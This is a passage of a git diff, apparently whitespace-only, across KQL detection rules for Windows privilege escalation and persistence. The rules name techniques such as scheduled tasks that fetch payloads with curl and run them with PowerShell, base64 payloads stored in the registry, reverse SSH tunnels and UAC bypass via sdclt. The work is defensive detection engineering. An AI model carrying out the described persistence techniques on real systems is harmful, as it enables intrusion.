 | where ((RegistryValueData contains ".bat" or RegistryValueData contains ".bin" or RegistryValueData contains ".cmd" or RegistryValueData contains ".dat" or RegistryValueData contains ".dll" or RegistryValueData contains ".exe" or RegistryValueData contains ".hta" or RegistryValueData contains ".jar" or RegistryValueData contains ".js" or RegistryValueData contains ".msi" or RegistryValueData contains ".ps" or RegistryValueData contains ".sh" or RegistryValueData contains ".vb") and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController*" and RegistryKey endswith "\\Command") and (not((RegistryValueData contains "\\system32\\CompatTelRunner.exe" or RegistryValueData contains "\\system32\\DeviceCensus.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_ripzip_attack_on_startup_folder.kql b/KQL/rules/Privilege Escalation/potential_ripzip_attack_on_startup_folder.kql
index eee75d40..925e5d2e 100644
--- a/KQL/rules/Privilege Escalation/potential_ripzip_attack_on_startup_folder.kql
+++ b/KQL/rules/Privilege Escalation/potential_ripzip_attack_on_startup_folder.kql
@@ -1,12 +1,12 @@
-// Title: Potential RipZip Attack on Startup Folder
-// Author: Greg (rule)
-// Date: 2022-07-21
-// Level: high
-// Description: Detects a phishing attack which expands a ZIP file containing a malicious shortcut.
-// If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.
-// Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547
-
-DeviceFileEvents
+// Title: Potential RipZip Attack on Startup Folder
+// Author: Greg (rule)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects a phishing attack which expands a ZIP file containing a malicious shortcut.
+// If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.
+// Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547
+
+DeviceFileEvents
 | where InitiatingProcessFolderPath endswith "\\explorer.exe" and (FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" and FolderPath contains ".lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql b/KQL/rules/Privilege Escalation/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql
index b9de7124..5f831e69 100644
--- a/KQL/rules/Privilege Escalation/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql
+++ b/KQL/rules/Privilege Escalation/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql
@@ -1,10 +1,10 @@
-// Title: Potential SSH Tunnel Persistence Install Using A Scheduled Task
-// Author: Rory Duncan
-// Date: 2025-07-14
-// Level: high
-// Description: Detects the creation of new scheduled tasks via commandline, using Schtasks.exe. This rule detects tasks creating that call OpenSSH, which may indicate the creation of reverse SSH tunnel to the attacker's server.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005, attack.command-and-control
-
-DeviceProcessEvents
+// Title: Potential SSH Tunnel Persistence Install Using A Scheduled Task
+// Author: Rory Duncan
+// Date: 2025-07-14
+// Level: high
+// Description: Detects the creation of new scheduled tasks via commandline, using Schtasks.exe. This rule detects tasks creating that call OpenSSH, which may indicate the creation of reverse SSH tunnel to the attacker's server.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005, attack.command-and-control
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and ((ProcessCommandLine contains " /create " and ProcessCommandLine contains "ssh.exe" and ProcessCommandLine contains "-i") or (ProcessCommandLine contains " /create " and ProcessCommandLine contains "sshd.exe" and ProcessCommandLine contains "-f"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_startup_shortcut_persistence_via_powershell_exe.kql b/KQL/rules/Privilege Escalation/potential_startup_shortcut_persistence_via_powershell_exe.kql
index eab7732d..d38c938e 100644
--- a/KQL/rules/Privilege Escalation/potential_startup_shortcut_persistence_via_powershell_exe.kql
+++ b/KQL/rules/Privilege Escalation/potential_startup_shortcut_persistence_via_powershell_exe.kql
@@ -1,15 +1,15 @@
-// Title: Potential Startup Shortcut Persistence Via PowerShell.EXE
-// Author: Christopher Peacock '@securepeacock', SCYTHE
-// Date: 2021-10-24
-// Level: high
-// Description: Detects PowerShell writing startup shortcuts.
-// This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.
-// Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.
-// In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL"
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
-// False Positives:
-// - Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware.
-
-DeviceFileEvents
+// Title: Potential Startup Shortcut Persistence Via PowerShell.EXE
+// Author: Christopher Peacock '@securepeacock', SCYTHE
+// Date: 2021-10-24
+// Level: high
+// Description: Detects PowerShell writing startup shortcuts.
+// This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.
+// Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.
+// In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL"
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Depending on your environment accepted applications may leverage this at times. 
It is recommended to search for anomalies inidicative of malware.
+
+DeviceFileEvents
 | where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath contains "\\start menu\\programs\\startup\\" and FolderPath endswith ".lnk"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_uac_bypass_via_sdclt_exe.kql b/KQL/rules/Privilege Escalation/potential_uac_bypass_via_sdclt_exe.kql
index 291e35e0..427d3856 100644
--- a/KQL/rules/Privilege Escalation/potential_uac_bypass_via_sdclt_exe.kql
+++ b/KQL/rules/Privilege Escalation/potential_uac_bypass_via_sdclt_exe.kql
@@ -1,10 +1,10 @@
-// Title: Potential UAC Bypass Via Sdclt.EXE
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020-05-02
-// Level: medium
-// Description: A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
-
-DeviceProcessEvents
+// Title: Potential UAC Bypass Via Sdclt.EXE
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: medium
+// Description: A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+
+DeviceProcessEvents
 | where FolderPath endswith "sdclt.exe" and (ProcessIntegrityLevel in~ ("High", "S-1-16-12288"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/powershell_web_access_feature_enabled_via_dism.kql b/KQL/rules/Privilege Escalation/powershell_web_access_feature_enabled_via_dism.kql
index 0cee95d1..fb4dba3f 100644
--- a/KQL/rules/Privilege Escalation/powershell_web_access_feature_enabled_via_dism.kql
+++ b/KQL/rules/Privilege Escalation/powershell_web_access_feature_enabled_via_dism.kql
@@ -1,12 +1,12 @@
-// Title: PowerShell Web Access Feature Enabled Via DISM
-// Author: Michael Haag
-// Date: 2024-09-03
-// Level: high
-// Description: Detects the use of DISM to enable the PowerShell Web Access feature, which could be used for remote access and potential abuse
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1548.002
-// False Positives:
-// - Legitimate PowerShell Web Access installations by administrators
-
-DeviceProcessEvents
+// Title: PowerShell Web Access Feature Enabled Via DISM
+// Author: Michael Haag
+// Date: 2024-09-03
+// Level: high
+// Description: Detects the use of DISM to enable the PowerShell Web Access feature, which could be used for remote access and potential abuse
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1548.002
+// False Positives:
+// - Legitimate PowerShell Web Access installations by administrators
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "WindowsPowerShellWebAccess" and ProcessCommandLine contains "/online" and ProcessCommandLine contains "/enable-feature") and (FolderPath endswith "\\dism.exe" or ProcessVersionInfoOriginalFileName =~ "DISM.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/registry_persistence_via_explorer_run_key.kql b/KQL/rules/Privilege Escalation/registry_persistence_via_explorer_run_key.kql
index bb1151e7..865f2147 100644
--- a/KQL/rules/Privilege Escalation/registry_persistence_via_explorer_run_key.kql
+++ b/KQL/rules/Privilege Escalation/registry_persistence_via_explorer_run_key.kql
@@ -1,10 +1,10 @@
-// Title: Registry Persistence via Explorer Run Key
-// Author: Florian Roth (Nextron Systems), oscd.community
-// Date: 2018-07-18
-// Level: high
-// Description: Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
-
-DeviceRegistryEvents
+// Title: Registry Persistence via Explorer Run Key
+// Author: Florian Roth (Nextron Systems), oscd.community
+// Date: 2018-07-18
+// Level: high
+// Description: Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+
+DeviceRegistryEvents
 | where (RegistryValueData contains ":\\$Recycle.bin\\" or RegistryValueData contains ":\\ProgramData\\" or RegistryValueData contains ":\\Temp\\" or RegistryValueData contains ":\\Users\\Default\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\") and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/regsvr32_dll_execution_with_uncommon_extension.kql b/KQL/rules/Privilege Escalation/regsvr32_dll_execution_with_uncommon_extension.kql
index 287d95b5..f3ffff0c 100644
--- a/KQL/rules/Privilege Escalation/regsvr32_dll_execution_with_uncommon_extension.kql
+++ b/KQL/rules/Privilege Escalation/regsvr32_dll_execution_with_uncommon_extension.kql
@@ -1,12 +1,12 @@
-// Title: Regsvr32 DLL Execution With Uncommon Extension
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019-07-17
-// Level: medium
-// Description: Detects a "regsvr32" execution where the DLL doesn't contain a common file extension.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574, attack.execution
-// False Positives:
-// - Other legitimate extensions currently not in the list either from third party or specific Windows components.
-
-DeviceProcessEvents
+// Title: Regsvr32 DLL Execution With Uncommon Extension
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-07-17
+// Level: medium
+// Description: Detects a "regsvr32" execution where the DLL doesn't contain a common file extension.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574, attack.execution
+// False Positives:
+// - Other legitimate extensions currently not in the list either from third party or specific Windows components.
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and (not((ProcessCommandLine =~ "" or (ProcessCommandLine contains ".ax" or ProcessCommandLine contains ".cpl" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".ocx") or isnull(ProcessCommandLine)))) and (not((ProcessCommandLine contains ".bav" or ProcessCommandLine contains ".ppl")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/renamed_vmnat_exe_execution.kql b/KQL/rules/Privilege Escalation/renamed_vmnat_exe_execution.kql
index 483594bf..484b703a 100644
--- a/KQL/rules/Privilege Escalation/renamed_vmnat_exe_execution.kql
+++ b/KQL/rules/Privilege Escalation/renamed_vmnat_exe_execution.kql
@@ -1,10 +1,10 @@
-// Title: Renamed Vmnat.exe Execution
-// Author: elhoim
-// Date: 2022-09-09
-// Level: high
-// Description: Detects renamed vmnat.exe or portable version that can be used for DLL side-loading
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
-
-DeviceProcessEvents
+// Title: Renamed Vmnat.exe Execution
+// Author: elhoim
+// Date: 2022-09-09
+// Level: high
+// Description: Detects renamed vmnat.exe or portable version that can be used for DLL side-loading
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+
+DeviceProcessEvents
 | where ProcessVersionInfoOriginalFileName =~ "vmnat.exe" and (not(FolderPath endswith "vmnat.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/root_account_enable_via_dsenableroot.kql b/KQL/rules/Privilege Escalation/root_account_enable_via_dsenableroot.kql
index dd73044f..d632a175 100644
--- a/KQL/rules/Privilege Escalation/root_account_enable_via_dsenableroot.kql
+++ b/KQL/rules/Privilege Escalation/root_account_enable_via_dsenableroot.kql
@@ -1,10 +1,10 @@
-// Title: Root Account Enable Via Dsenableroot
-// Author: Sohan G (D4rkCiph3r)
-// Date: 2023-08-22
-// Level: medium
-// Description: Detects attempts to enable the root account via "dsenableroot"
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1078, attack.t1078.001, attack.t1078.003, attack.initial-access, attack.persistence
-
-DeviceProcessEvents
+// Title: Root Account Enable Via Dsenableroot
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-08-22
+// Level: medium
+// Description: Detects attempts to enable the root account via "dsenableroot"
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1078, attack.t1078.001, attack.t1078.003, attack.initial-access, attack.persistence
+
+DeviceProcessEvents
 | where FolderPath endswith "/dsenableroot" and (not(ProcessCommandLine contains " -d "))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/rundll32_registered_com_objects.kql b/KQL/rules/Privilege Escalation/rundll32_registered_com_objects.kql
index f6972c12..01fdf026 100644
--- a/KQL/rules/Privilege Escalation/rundll32_registered_com_objects.kql
+++ b/KQL/rules/Privilege Escalation/rundll32_registered_com_objects.kql
@@ -1,12 +1,12 @@
-// Title: Rundll32 Registered COM Objects
-// Author: frack113
-// Date: 2022-02-13
-// Level: high
-// Description: load malicious registered COM objects
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015
-// False Positives:
-// - Legitimate use
-
-DeviceProcessEvents
+// Title: Rundll32 Registered COM Objects
+// Author: frack113
+// Date: 2022-02-13
+// Level: high
+// Description: load malicious registered COM objects
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "-sta " or ProcessCommandLine contains "-localserver ") and (ProcessCommandLine contains "{" and ProcessCommandLine contains "}")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql b/KQL/rules/Privilege Escalation/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql
index 18ddba49..60c74f99 100644
--- a/KQL/rules/Privilege Escalation/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql
+++ b/KQL/rules/Privilege Escalation/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql
@@ -1,13 +1,13 @@
-// Title: Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-02-21
-// Level: medium
-// Description: Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
-// False Positives:
-// - Benign scheduled tasks creations or executions that happen often during software installations
-// - Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders
-
-DeviceProcessEvents
+// Title: Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-21
+// Level: medium
+// Description: Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
+// False Positives:
+// - Benign scheduled tasks creations or executions that happen often during software installations
+// - Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders
+
+DeviceProcessEvents
 | where (((ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\Users\\All Users\\" or ProcessCommandLine contains ":\\Users\\Default\\" or ProcessCommandLine contains ":\\Users\\Public" or ProcessCommandLine contains ":\\Windows\\Temp" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Public%") and ((ProcessCommandLine contains " -create " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " –create " or 
ProcessCommandLine contains " —create " or ProcessCommandLine contains " ―create ") and FolderPath endswith "\\schtasks.exe")) or (InitiatingProcessCommandLine endswith "\\svchost.exe -k netsvcs -p -s Schedule" and (ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\Windows\\Temp" or ProcessCommandLine contains "\\Users\\Public" or ProcessCommandLine contains "%Public%"))) and (not(((ProcessCommandLine contains "/Create /Xml " and ProcessCommandLine contains "\\Temp\\.CR." and ProcessCommandLine contains "\\Avira_Security_Installation.xml") or ((ProcessCommandLine contains ".tmp\\UpdateFallbackTask.xml" or ProcessCommandLine contains ".tmp\\WatchdogServiceControlManagerTimeout.xml" or ProcessCommandLine contains ".tmp\\SystrayAutostart.xml" or ProcessCommandLine contains ".tmp\\MaintenanceTask.xml") and (ProcessCommandLine contains "/Create /F /TN" and ProcessCommandLine contains "/Xml " and ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains "Avira_")) or (ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains "/Create /TN \"klcp_update\" /XML " and ProcessCommandLine contains "\\klcp_update_task.xml") or (InitiatingProcessCommandLine contains "unattended.ini" or ProcessCommandLine contains "update_task.xml") or ProcessCommandLine contains "/Create /TN TVInstallRestore /TR")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/scheduled_task_creation_masquerading_as_system_processes.kql b/KQL/rules/Privilege Escalation/scheduled_task_creation_masquerading_as_system_processes.kql
index 74981cca..a66f86ff 100644
--- a/KQL/rules/Privilege Escalation/scheduled_task_creation_masquerading_as_system_processes.kql
+++ b/KQL/rules/Privilege Escalation/scheduled_task_creation_masquerading_as_system_processes.kql
@@ -1,12 +1,12 @@
-// Title: Scheduled Task Creation Masquerading as System Processes
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-02-05
-// Level: high
-// Description: Detects the creation of scheduled tasks that involve system processes, which may indicate malicious actors masquerading as or abusing these processes to execute payloads or maintain persistence.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.defense-evasion, attack.t1036.004, attack.t1036.005
-// False Positives:
-// - Legitimate system administration tasks scheduling trusted system processes.
-
-DeviceProcessEvents
+// Title: Scheduled Task Creation Masquerading as System Processes
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-02-05
+// Level: high
+// Description: Detects the creation of scheduled tasks that involve system processes, which may indicate malicious actors masquerading as or abusing these processes to execute payloads or maintain persistence.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.defense-evasion, attack.t1036.004, attack.t1036.005
+// False Positives:
+// - Legitimate system administration tasks scheduling trusted system processes.
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " audiodg" or ProcessCommandLine contains " conhost" or ProcessCommandLine contains " dwm.exe" or ProcessCommandLine contains " explorer" or ProcessCommandLine contains " lsass" or ProcessCommandLine contains " lsm" or ProcessCommandLine contains " mmc" or ProcessCommandLine contains " msiexec" or ProcessCommandLine contains " regsvr32" or ProcessCommandLine contains " rundll32" or ProcessCommandLine contains " services" or ProcessCommandLine contains " spoolsv" or ProcessCommandLine contains " svchost" or ProcessCommandLine contains " taskeng" or ProcessCommandLine contains " taskhost" or ProcessCommandLine contains " wininit" or ProcessCommandLine contains " winlogon") and (ProcessCommandLine contains " -create " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " –create " or ProcessCommandLine contains " —create " or ProcessCommandLine contains " ―create ")) and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql b/KQL/rules/Privilege Escalation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql
index 66dfa068..3a32711c 100644
--- a/KQL/rules/Privilege Escalation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql
+++ b/KQL/rules/Privilege Escalation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql
@@ -1,14 +1,14 @@
-// Title: Scheduled Task Creation with Curl and PowerShell Execution Combo
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-02-05
-// Level: medium
-// Description: Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them.
-// This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105
-// False Positives:
-// - Legitimate use of schtasks for administrative purposes.
-// - Automation scripts combining curl and PowerShell in controlled environments.
-
-DeviceProcessEvents
+// Title: Scheduled Task Creation with Curl and PowerShell Execution Combo
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-02-05
+// Level: medium
+// Description: Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them.
+// This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105
+// False Positives:
+// - Legitimate use of schtasks for administrative purposes.
+// - Automation scripts combining curl and PowerShell in controlled environments.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "curl " and ProcessCommandLine contains "http" and ProcessCommandLine contains "-o") and ((ProcessCommandLine contains " -create " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " –create " or ProcessCommandLine contains " —create " or ProcessCommandLine contains " ―create ") and FolderPath endswith "\\schtasks.exe") and ProcessCommandLine contains "powershell"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/scheduled_task_executing_encoded_payload_from_registry.kql b/KQL/rules/Privilege Escalation/scheduled_task_executing_encoded_payload_from_registry.kql
index 48a2d5d9..f2416006 100644
--- a/KQL/rules/Privilege Escalation/scheduled_task_executing_encoded_payload_from_registry.kql
+++ b/KQL/rules/Privilege Escalation/scheduled_task_executing_encoded_payload_from_registry.kql
@@ -1,12 +1,12 @@
-// Title: Scheduled Task Executing Encoded Payload from Registry
-// Author: pH-T (Nextron Systems), @Kostastsale, TheDFIRReport, X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-02-12
-// Level: high
-// Description: Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Scheduled Task Executing Encoded Payload from Registry
+// Author: pH-T (Nextron Systems), @Kostastsale, TheDFIRReport, X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-02-12
+// Level: high
+// Description: Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "/Create" and (ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "encodedcommand") and (ProcessCommandLine contains "Get-ItemProperty" or ProcessCommandLine contains " gp ") and (ProcessCommandLine contains "HKCU:" or ProcessCommandLine contains "HKLM:" or ProcessCommandLine contains "registry::" or ProcessCommandLine contains "HKEY_") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/scheduled_task_executing_payload_from_registry.kql b/KQL/rules/Privilege Escalation/scheduled_task_executing_payload_from_registry.kql
index 9da4b61e..286baa0c 100644
--- a/KQL/rules/Privilege Escalation/scheduled_task_executing_payload_from_registry.kql
+++ b/KQL/rules/Privilege Escalation/scheduled_task_executing_payload_from_registry.kql
@@ -1,10 +1,10 @@
-// Title: Scheduled Task Executing Payload from Registry
-// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-07-18
-// Level: medium
-// Description: Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
-
-DeviceProcessEvents
+// Title: Scheduled Task Executing Payload from Registry
+// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-18
+// Level: medium
+// Description: Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/Create" and (ProcessCommandLine contains "Get-ItemProperty" or ProcessCommandLine contains " gp ") and (ProcessCommandLine contains "HKCU:" or ProcessCommandLine contains "HKLM:" or ProcessCommandLine contains "registry::" or ProcessCommandLine contains "HKEY_") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) and (not((ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "encodedcommand")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/scheduled_task_job_at.kql b/KQL/rules/Privilege Escalation/scheduled_task_job_at.kql
index 8aa8670e..ee1cc60f 100644
--- a/KQL/rules/Privilege Escalation/scheduled_task_job_at.kql
+++ b/KQL/rules/Privilege Escalation/scheduled_task_job_at.kql
@@ -1,13 +1,13 @@
-// Title: Scheduled Task/Job At
-// Author: Ömer Günal, oscd.community
-// Date: 2020-10-06
-// Level: low
-// Description: Detects the use of at/atd which are utilities that are used to schedule tasks.
-// They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.002
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: Scheduled Task/Job At
+// Author: Ömer Günal, oscd.community
+// Date: 2020-10-06
+// Level: low
+// Description: Detects the use of at/atd which are utilities that are used to schedule tasks.
+// They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.002
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where FolderPath endswith "/at" or FolderPath endswith "/atd"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/scheduled_taskcache_change_by_uncommon_program.kql b/KQL/rules/Privilege Escalation/scheduled_taskcache_change_by_uncommon_program.kql
index 9b54a51a..8358e184 100644
--- a/KQL/rules/Privilege Escalation/scheduled_taskcache_change_by_uncommon_program.kql
+++ b/KQL/rules/Privilege Escalation/scheduled_taskcache_change_by_uncommon_program.kql
@@ -1,10 +1,10 @@
-// Title: Scheduled TaskCache Change by Uncommon Program
-// Author: Syed Hasan (@syedhasan009)
-// Date: 2021-06-18
-// Level: high
